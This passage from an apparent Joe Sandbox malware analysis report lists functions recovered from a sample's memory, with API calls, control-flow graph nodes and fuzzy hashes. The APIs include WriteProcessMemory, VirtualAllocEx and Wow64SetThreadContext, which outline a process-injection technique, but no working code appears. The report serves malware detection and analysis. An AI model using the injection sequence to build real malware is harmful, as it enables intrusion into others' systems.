                                                  • Opcode Fuzzy Hash: 7884951b0d1b2be8739fae1f9f29405e0bb895d056330c839e7dbf2b11d93a98
                                                  • Instruction Fuzzy Hash: CD51C2B1D00319DFDB14CFAAC985ADEBBB5FF48310F64812AE819AB211D771A845CF91
                                                  Function 05730BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 584 5730bfc-57342fc 587 5734302-5734307 584->587 588 57343ac-57343cc call 5730ad4 584->588 589 573435a-5734392 CallWindowProcW 587->589 590 5734309-5734340 587->590 595 57343cf-57343dc 588->595 593 5734394-573439a 589->593 594 573439b-57343aa 589->594 598 5734342-5734348 590->598 599 5734349-5734358 590->599 593->594 594->595 598->599 599->595
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 05734381
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1789246755.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_5730000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: 1c4a7387c74dc8f90511eac36f376e6b622e0a22b8080ebd89e6813a4d37304e
                                                  • Instruction ID: a5278ef8e9164ea90e0a31cc2e8aad9ae0f1d3b232b938b0731763d9ed859730
                                                  • Opcode Fuzzy Hash: 1c4a7387c74dc8f90511eac36f376e6b622e0a22b8080ebd89e6813a4d37304e
                                                  • Instruction Fuzzy Hash: 9141F8B59002099FCB14DF99C489AAABBF6FF88324F24C459D519AB321D775A841CFA0
                                                  Function 030C449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 601 30c449c-30c59d9 CreateActCtxA 604 30c59db-30c59e1 601->604 605 30c59e2-30c5a3c 601->605 604->605 612 30c5a3e-30c5a41 605->612 613 30c5a4b-30c5a4f 605->613 612->613 614 30c5a60 613->614 615 30c5a51-30c5a5d 613->615 616 30c5a61 614->616 615->614 616->616
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 030C59C9
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786567199.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_30c0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 6461c6dbb2d5e7d9da5da76d9d227bed26b95eb2727991a9f61140686ed0ea2a
                                                  • Instruction ID: ec97e867d9a3a9218a844f8c5657b5d5202a8e78008b9242aeeb744d602dd4f4
                                                  • Opcode Fuzzy Hash: 6461c6dbb2d5e7d9da5da76d9d227bed26b95eb2727991a9f61140686ed0ea2a
                                                  • Instruction Fuzzy Hash: F541F1B1C00659CBDB24DFAAC884B8EFBF5BF49304F2480AAD408AB255DB756945CF90
                                                  Function 030C590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 618 30c590c-30c590e 619 30c5918-30c59d9 CreateActCtxA 618->619 621 30c59db-30c59e1 619->621 622 30c59e2-30c5a3c 619->622 621->622 629 30c5a3e-30c5a41 622->629 630 30c5a4b-30c5a4f 622->630 629->630 631 30c5a60 630->631 632 30c5a51-30c5a5d 630->632 633 30c5a61 631->633 632->631 633->633
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 030C59C9
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786567199.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_30c0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 64434fa29e6bf06cf53e76e70190d9847d9e2a11bdea856272aec21540457bef
                                                  • Instruction ID: d39dd0b63dc53fcb98040092aa354f1a1340ed0b88d4684a177f555127132175
                                                  • Opcode Fuzzy Hash: 64434fa29e6bf06cf53e76e70190d9847d9e2a11bdea856272aec21540457bef
                                                  • Instruction Fuzzy Hash: 3141D1B1C00659CFDB24DFAAC884B8EFBF5BF49304F24809AD408AB255DB756985CF90
                                                  Function 030CA858 Relevance: 1.6, APIs: 1, Instructions: 79libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 635 30ca858-30ca860 637 30ca88c-30ca8c0 635->637 638 30ca862-30ca877 635->638 639 30cb2a8-30cb2e8 637->639 638->639 641 30cb2ea-30cb2ed 639->641 642 30cb2f0-30cb31f LoadLibraryExW 639->642 641->642 644 30cb328-30cb345 642->644 645 30cb321-30cb327 642->645 645->644
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030CB101,00000800,00000000,00000000), ref: 030CB312
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786567199.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_30c0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 48bcdcb7e324dbb28c70305a26478cede9a8c0b3938963ab890cf682460dbf13
                                                  • Instruction ID: 916363b6e98c10fbff540c3c0ba1abf91674f182e00ed0eaa47b7cd9bafe4bad
                                                  • Opcode Fuzzy Hash: 48bcdcb7e324dbb28c70305a26478cede9a8c0b3938963ab890cf682460dbf13
                                                  • Instruction Fuzzy Hash: 4A31A9B68043988FDB00DFA9C8556EEBFF4EF59310F04806AC494AB252C274A549CFA5
                                                  Function 0795B430 Relevance: 1.6, APIs: 1, Instructions: 72windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 648 795b430-795b439 650 795b3d7-795b3e3 648->650 651 795b43b-795b448 648->651 652 795b3eb-795b3ed 650->652 653 795b42a-795b42b 651->653 656 795b44a-795b458 651->656 652->653 655 795d280-795d2ea PostMessageW 653->655 657 795d2f3-795d307 655->657 658 795d2ec-795d2f2 655->658 656->651 661 795b45a-795b460 656->661 658->657 661->652 662 795b462-795b463 661->662 662->655
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0795D2DD
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 18f7f0fa9698bf86e7dd122b786dc3626a465ca1e1891cd4afe2f33d3cf70b2a
                                                  • Instruction ID: d6e00a064ce4b0fb4c5b3a53fb3ae7488b19c9e1faaacbcc3dd6dd51a44d9498
                                                  • Opcode Fuzzy Hash: 18f7f0fa9698bf86e7dd122b786dc3626a465ca1e1891cd4afe2f33d3cf70b2a
                                                  • Instruction Fuzzy Hash: 2F21ABF28043688FDB11DFA9C4957CABFB8EB58324F14845AD894B7320D374A584CBA5
                                                  Function 07959450 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 079594E0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: bf1690bcc6df9985acb7210949cba9314f782b5b7b9bef52192547b88c053b15
                                                  • Instruction ID: d4014a61c949c2a8026eb28d2dc176d32254ba347a5fb58534595cf6073e54de
                                                  • Opcode Fuzzy Hash: bf1690bcc6df9985acb7210949cba9314f782b5b7b9bef52192547b88c053b15
                                                  • Instruction Fuzzy Hash: 442139B1900359DFDB10CFAAC885BDEBBF5FF48324F108429E958A7250C778A944CBA4
                                                  Function 07959448 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 663 7959448-795949e 665 79594a0-79594ac 663->665 666 79594ae-79594ed WriteProcessMemory 663->666 665->666 668 79594f6-7959526 666->668 669 79594ef-79594f5 666->669 669->668
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 079594E0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 1928e80d221ff8149418a11387dda0d02060e543c20ff7ecd2bc3678158c3582
                                                  • Instruction ID: 805ae22027f4947acbb61393bd847cd51cc007f3c247427df73b8467cded7756
                                                  • Opcode Fuzzy Hash: 1928e80d221ff8149418a11387dda0d02060e543c20ff7ecd2bc3678158c3582
                                                  • Instruction Fuzzy Hash: 7C2148B5900359DFDB10CFA9C8817EEBBF5FF48324F108429E958A7251C7749944CB64
                                                  Function 030CC9A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,030CD2C6,?,?,?,?,?), ref: 030CD387
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786567199.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_30c0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: fe19ff9991aa8979027c1811860f683975bfc5fe137270627fbce9b9ea5b74c7
                                                  • Instruction ID: 3e44d7503041c274f33f685b8a65c6d3e44da388e84fdabaa30cd9d3331b763f
                                                  • Opcode Fuzzy Hash: fe19ff9991aa8979027c1811860f683975bfc5fe137270627fbce9b9ea5b74c7
                                                  • Instruction Fuzzy Hash: 7821E3B5901348AFDB10CF9AD984ADEBBF4EB48310F14842AE918B7350D375A950CFA4
                                                  Function 07959538 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 079595C0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 3eee7e5728e44c7c25a6826bf2220baaecb0f0aea0d0310fa112db9573a6c2f9
                                                  • Instruction ID: 58a52bb31b3a6ab64023ac93b0f7bbbd593c58eece79be2a2548114cc4d67d17
                                                  • Opcode Fuzzy Hash: 3eee7e5728e44c7c25a6826bf2220baaecb0f0aea0d0310fa112db9573a6c2f9
                                                  • Instruction Fuzzy Hash: BA2136B1D003599FDB10CFA9C841BEEBBF4FF48324F10842AE958A7250C7389555CB64
                                                  Function 07959540 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 079595C0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: b9022bf7d15183bb6b3f7e6ed65f485574c00857ba27ba919b45bb638c7b0851
                                                  • Instruction ID: 73f3a41aaa75f27ce230db3f924b72eba10ef59df3c794b69b7ce8ac2394d2da
                                                  • Opcode Fuzzy Hash: b9022bf7d15183bb6b3f7e6ed65f485574c00857ba27ba919b45bb638c7b0851
                                                  • Instruction Fuzzy Hash: 1C2128B19003599FDB10DFAAC841BDEFBF5FF48320F508429E959A7250C734A955CBA4
                                                  Function 07958A48 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07958AC6
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 1f12421466b856529c0d6c3c17b73afc49a9390d8991c2a02ee564771d603189
                                                  • Instruction ID: 5eb2f57129469154ddd8c25487898ab48b02fb5e89e573d87f3f773f5cb2d05f
                                                  • Opcode Fuzzy Hash: 1f12421466b856529c0d6c3c17b73afc49a9390d8991c2a02ee564771d603189
                                                  • Instruction Fuzzy Hash: 5D2149B1D003198FDB10DFAAC485BEEBBF4EF88324F148429D459A7241C778A944CFA4
                                                  Function 07958A42 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07958AC6
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: c3cea671ac348354eb954858302162bfd1700782c4644dfc7ddb818fdb4cdf90
                                                  • Instruction ID: 01885a4f97e7b1472b7be9b9ed1c3216e297520416124aa3f949b64ea4dadb54
                                                  • Opcode Fuzzy Hash: c3cea671ac348354eb954858302162bfd1700782c4644dfc7ddb818fdb4cdf90
                                                  • Instruction Fuzzy Hash: B62138B1D002198FDB10DFA9C585BEEBBF4EF48314F14842AD559B7241C778A945CFA4
                                                  Function 030CD2F8 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,030CD2C6,?,?,?,?,?), ref: 030CD387
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786567199.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_30c0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: a85b01b9ee5192b858b217047dcc0b9402a3689410251177d17f09941128d83c
                                                  • Instruction ID: 4577b20f00ba7a3ae44957a74c6415f857f3693a1a4f464725c27160fe05d5e1
                                                  • Opcode Fuzzy Hash: a85b01b9ee5192b858b217047dcc0b9402a3689410251177d17f09941128d83c
                                                  • Instruction Fuzzy Hash: 4921E3B59002589FDB10CFA9D585ADEFBF5FB48310F14841AE918B7250D374A940CFA4
                                                  Function 030CA870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030CB101,00000800,00000000,00000000), ref: 030CB312
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786567199.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_30c0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: a8fcd57beb1f8a0c63d1ce04a82730d58e9be3ce3b922f496ead0107599d5018
                                                  • Instruction ID: 75e0f8461c2b3ea031e78c3c95be544b4eac8fd4173414f3db0ad3eb7d946eda
                                                  • Opcode Fuzzy Hash: a8fcd57beb1f8a0c63d1ce04a82730d58e9be3ce3b922f496ead0107599d5018
                                                  • Instruction Fuzzy Hash: 0E1112B69003489FDB10CF9AC445AEEFBF8EB48310F14842EE829B7210C375A945CFA5
                                                  Function 07959390 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079593FE
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 2a45cdb6bb1e9c040012f67c86ee09d3a5f1b880c72b128bd01e1ef2e230b0fe
                                                  • Instruction ID: e8d703e83a3263527d7e2af66f5a0589068e6b5f1ddbd3cc46731836717f5317
                                                  • Opcode Fuzzy Hash: 2a45cdb6bb1e9c040012f67c86ee09d3a5f1b880c72b128bd01e1ef2e230b0fe
                                                  • Instruction Fuzzy Hash: 5F1167B1800259DFDB10DFAAC844BEEBFF5EF88324F208419E519A7250C735A940CFA4
                                                  Function 07959388 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079593FE
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 46cb638ba8966b5d2edee00e7adee9410d83664a6d8e3bcf28bc9d94cd5020b5
                                                  • Instruction ID: feb7788377bf337a342b4e0df9d12a721a1b042c24809c08275c4a75de968b38
                                                  • Opcode Fuzzy Hash: 46cb638ba8966b5d2edee00e7adee9410d83664a6d8e3bcf28bc9d94cd5020b5
                                                  • Instruction Fuzzy Hash: 4B1156B6900259CFDB10CFA9C845BEEBBF5AF48324F248819D569B7250C735A944CFA4
                                                  Function 030CB2A1 Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030CB101,00000800,00000000,00000000), ref: 030CB312
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786567199.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_30c0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: ea9d3a08629f7e0ffb6817c67362eda6594166009289011a3d3b9de762b865e9
                                                  • Instruction ID: 1404949d673b3321f89d10b101b2533ebbd838a1387ad837d7a61d7fb1cbcd51
                                                  • Opcode Fuzzy Hash: ea9d3a08629f7e0ffb6817c67362eda6594166009289011a3d3b9de762b865e9
                                                  • Instruction Fuzzy Hash: 7611EFB69002498FDB10CF9AD545AEEFBF8EB48320F14852ED869B7210C379A545CFA5
                                                  Function 07958998 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: ab7f0624b225afb2e063f64b182c11365077148351fe377cf8e9d51510e9cd39
                                                  • Instruction ID: b602cb8da033d2240016904a441c51d6fedcca4f1a18dd4969a097ed1d6b2499
                                                  • Opcode Fuzzy Hash: ab7f0624b225afb2e063f64b182c11365077148351fe377cf8e9d51510e9cd39
                                                  • Instruction Fuzzy Hash: 93113AB19003598FDB10DFAAC4457EEFBF4EB88324F208419D459B7250C775A944CFA5
                                                  Function 07958990 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 7127b4eb41f1ffc53441db3797330c3a398d649fcc438574573e0eb47c0db324
                                                  • Instruction ID: bff09863bd498f6688b25a562e6094291873d163d34743c14b57a24edff6a7ac
                                                  • Opcode Fuzzy Hash: 7127b4eb41f1ffc53441db3797330c3a398d649fcc438574573e0eb47c0db324
                                                  • Instruction Fuzzy Hash: C71128B19002598FDB14DFA9C4457EEFBF4AF88324F208829C559B7250C7356944CF95
                                                  Function 030CB020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 030CB086
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786567199.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_30c0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 1df7d867020e6eba697abb6e9afe29133b01bad524eca9c23afc343e63eda884
                                                  • Instruction ID: d73bca39fda80f700b5d8fdb4ad2ec90d031cd3b26ee1bafd73e0aaefc5e1fdb
                                                  • Opcode Fuzzy Hash: 1df7d867020e6eba697abb6e9afe29133b01bad524eca9c23afc343e63eda884
                                                  • Instruction Fuzzy Hash: D211DFB5C003498FDB20DF9AC445ADEFBF4AB88224F24846AD869B7210C375A545CFA5
                                                  Function 0795B424 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0795D2DD
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 8e8925d2882e9ca2bf91e7101cfd323815c08b526f0cc551ff5ccdd8f929c910
                                                  • Instruction ID: dd65ead460535f52164becf73eb1e07debf0229d35bb32dd3809c652859889ca
                                                  • Opcode Fuzzy Hash: 8e8925d2882e9ca2bf91e7101cfd323815c08b526f0cc551ff5ccdd8f929c910
                                                  • Instruction Fuzzy Hash: 061103B5900359DFDB10DF9AC485BDEBBF8EB48324F108459E968B7210C375A984CFA5
                                                  Function 0795D27F Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0795D2DD
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: f9c089d638118752d6b4e1b94d3b3d55a93de0ed3fb2c278c44c78e831712f35
                                                  • Instruction ID: 7b4c8952db9eb38be115aa0f4bd450c38c078c7e5d74fe9fc9720da1856c56a5
                                                  • Opcode Fuzzy Hash: f9c089d638118752d6b4e1b94d3b3d55a93de0ed3fb2c278c44c78e831712f35
                                                  • Instruction Fuzzy Hash: 7C1100B5800359DFDB10DF99C585BDEBBF8EB08324F20881AD968B7210C375A984CFA4
                                                  Function 0147D4C4 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786013442.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_147d000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 17cb34875e3afe7ba79335bba0c7f905e581dcf614238c414735d99b25941c28
                                                  • Instruction ID: 6bea919c90fd6490c0e65140a73ede901788766d4c47f5295735d3a66b4fbea7
                                                  • Opcode Fuzzy Hash: 17cb34875e3afe7ba79335bba0c7f905e581dcf614238c414735d99b25941c28
                                                  • Instruction Fuzzy Hash: 8E210371910240DFDB05DF58D9C0B67BF65FF88318F24C66AE9090B266C336D456CAA1
                                                  Function 0147D3D8 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786013442.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_147d000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 03b76e4f6f6604f85d4bb606cbd7c07820995dc8c94a8ca0942ee3f79f80f208
                                                  • Instruction ID: 21cdf9380db341ede86abc67aadcc5c39c0d2b1f727e4f73f9f4e283f41890dc
                                                  • Opcode Fuzzy Hash: 03b76e4f6f6604f85d4bb606cbd7c07820995dc8c94a8ca0942ee3f79f80f208
                                                  • Instruction Fuzzy Hash: 2C212471910200DFDB05DF48CAC0B97BF65FF84324F20C17AD9094B266C336E446CAA1
                                                  Function 0148D01C Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786069367.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_148d000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 34127002aa4544e30dad05a90b160fbf94bc1d4fbf1346a16371fc11a5a42d6d
                                                  • Instruction ID: 3819c4672efbf84e0414a1d5419270021744681f37d5fbae1fa35ee8118c3895
                                                  • Opcode Fuzzy Hash: 34127002aa4544e30dad05a90b160fbf94bc1d4fbf1346a16371fc11a5a42d6d
                                                  • Instruction Fuzzy Hash: B92125B1904200DFDB15EF58D984B1ABFA5EB85318F20C56ED90A4B3A6C336D447CA61
                                                  Function 0148D1D4 Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786069367.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
